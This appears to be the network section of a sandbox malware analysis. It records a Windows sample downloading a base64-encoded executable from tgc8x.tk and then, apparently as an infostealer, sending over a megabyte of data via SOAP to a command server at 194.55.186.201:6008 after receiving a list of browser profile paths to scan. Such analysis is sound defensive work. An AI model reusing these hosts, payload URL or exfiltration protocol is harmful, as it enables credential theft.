Nov 3, 2022 12:45:25.566220045 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.566248894 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.566375017 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.566471100 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.566476107 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.566682100 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.566776991 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.566850901 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.566965103 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567080975 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.567121029 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567183971 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.567236900 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567363977 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567461967 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.567472935 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567522049 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.567604065 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567660093 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567737103 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.567751884 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.567883015 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.568011999 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.568017006 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.568175077 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.568233967 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.568315029 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.568386078 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.585700989 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.585782051 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.585814953 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.585863113 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.586124897 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.586169958 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.586513042 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.586783886 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.586946011 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.587255001 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.587340117 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.587722063 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.587857008 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.587934017 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.588011980 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.588105917 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.588211060 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.588587046 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.588747025 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.588773966 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595266104 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:25.595442057 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595467091 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595484972 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595496893 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595508099 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595519066 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595530987 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595541954 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595554113 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595561028 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595567942 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595583916 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595597029 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595607042 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595614910 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595626116 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595660925 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595671892 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595683098 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595694065 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595705032 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595724106 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595735073 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595745087 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595756054 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595767975 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595777988 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595798016 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595808983 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595819950 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595832109 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595843077 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595854044 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595865011 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595875978 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595885992 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595896959 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595916033 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595927000 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595937014 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595949888 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595961094 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595972061 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595983028 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.595993042 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596004009 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596014977 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596035004 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596045017 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596055984 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596065998 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596076965 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596088886 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596100092 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596111059 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596122026 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596132040 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596143007 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596153021 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596163988 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596174955 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596193075 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596204042 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596215010 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596225977 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596236944 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596247911 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596259117 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596268892 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596281052 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596291065 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596302032 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596313000 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.596323013 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.623369932 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.623446941 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.650727987 CET	6008	49700	194.55.186.201	192.168.2.4
Nov 3, 2022 12:45:25.712915897 CET	49700	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:26.057531118 CET	49699	6008	192.168.2.4	194.55.186.201
Nov 3, 2022 12:45:26.057693958 CET	49700	6008	192.168.2.4	194.55.186.201

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:44:38.337913990 CET	56572	53	192.168.2.4	8.8.8.8
Nov 3, 2022 12:44:38.365986109 CET	53	56572	8.8.8.8	192.168.2.4
Nov 3, 2022 12:45:07.954663992 CET	50911	53	192.168.2.4	8.8.8.8
Nov 3, 2022 12:45:07.986056089 CET	59683	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 12:44:38.337913990 CET	192.168.2.4	8.8.8.8	0x53e5	Standard query (0)	tgc8x.tk	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:45:07.954663992 CET	192.168.2.4	8.8.8.8	0x5f34	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:45:07.986056089 CET	192.168.2.4	8.8.8.8	0x3a	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 12:44:38.365986109 CET	8.8.8.8	192.168.2.4	0x53e5	No error (0)	tgc8x.tk		50.115.174.192	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:45:07.974468946 CET	8.8.8.8	192.168.2.4	0x5f34	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 3, 2022 12:45:08.007771969 CET	8.8.8.8	192.168.2.4	0x3a	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

tgc8x.tk

194.55.186.201:6008

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49695	50.115.174.192	443	C:\Users\user\Desktop\StZAEFSb2j.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49696	50.115.174.192	443	C:\Users\user\Desktop\StZAEFSb2j.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49697	194.55.186.201	6008	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:44:59.724581957 CET	255	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 194.55.186.201:6008 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 3, 2022 12:44:59.756546974 CET	255	IN	HTTP/1.1 100 Continue
Nov 3, 2022 12:44:59.792875051 CET	256	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 03 Nov 2022 11:44:59 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Nov 3, 2022 12:45:07.233059883 CET	256	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 194.55.186.201:6008 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 3, 2022 12:45:07.261348963 CET	256	IN	HTTP/1.1 100 Continue
Nov 3, 2022 12:45:07.319789886 CET	258	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 03 Nov 2022 11:45:07 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61 Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49699	194.55.186.201	6008	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:45:24.572396040 CET	270	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 194.55.186.201:6008 Content-Length: 1129933 Expect: 100-continue Accept-Encoding: gzip, deflate
Nov 3, 2022 12:45:24.602533102 CET	270	IN	HTTP/1.1 100 Continue
Nov 3, 2022 12:45:25.318094015 CET	1396	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 03 Nov 2022 11:45:25 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49700	194.55.186.201	6008	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:45:25.357532978 CET	1397	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 194.55.186.201:6008 Content-Length: 1129925 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Nov 3, 2022 12:45:25.384958982 CET	1397	IN	HTTP/1.1 100 Continue
Nov 3, 2022 12:45:25.650727987 CET	2520	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Thu, 03 Nov 2022 11:45:25 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49695	50.115.174.192	443	C:\Users\user\Desktop\StZAEFSb2j.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 11:44:39 UTC	0	OUT	GET /tt/lamb.txt HTTP/1.1 Host: tgc8x.tk Connection: Keep-Alive
2022-11-03 11:44:39 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 03 Nov 2022 11:44:38 GMT Server: Apache Last-Modified: Tue, 01 Nov 2022 06:29:51 GMT Accept-Ranges: bytes Content-Length: 130392 Connection: close Content-Type: text/plain
2022-11-03 11:44:39 UTC	0	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 4b 70 44 50 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 41 67 45 4c 41 54 41 41 41 48 51 42 41 41 41 49 41 41 41 41 41 41 41 41 50 70 4d 42 41 41 41 67 41 41 41 41 41 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKKpDPAAAAAAAAAAAOAAAgELATAAAHQBAAAIAAAAAAAAPpMBAAAgAAAAAAAAAABAAAAgAAAAAgA
